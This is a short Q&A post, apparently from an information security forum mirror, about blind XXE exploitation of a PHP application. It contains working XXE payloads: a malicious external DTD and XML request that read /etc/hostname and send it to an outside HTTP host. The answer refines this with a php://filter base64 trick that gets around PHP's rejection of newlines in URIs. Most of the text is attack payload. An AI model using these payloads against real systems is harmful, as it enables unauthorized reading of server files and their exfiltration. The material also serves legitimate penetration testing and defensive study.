Information Security Asked by user3207874 on October 28, 2021
When attempting to exploit blind XXE as explained in this article, I got an error in my apache logs:
PHP Warning: DOMDocument::loadXML(): Invalid URI: http://192.168.6.1/82a3ccab632c in Entity
The DTD file:
<!ENTITY % payload SYSTEM "file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY % send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;
The request:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE load SYSTEM "http://192.168.6.1/xxe.dtd">
<root><email>asd</email><password>asd</password></root>
Why can’t I send the /etc/hostname?
I found out the issue is that /etc/hostname has a newline at the end. Apparently, while Java applications have no problem with this (as shown in the article), PHP does not accept newlines in URIs.
I confirmed this by creating a file which doesn't contain a newline. I was able to send it successfully.
In fact, you can use the php:// protocol to convert the file's contents to base64 and get around the restriction. Here is the updated payload:
<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY % send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;
Answered by user3207874 on October 28, 2021
Get help from others!
Recent Questions
Recent Answers
© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP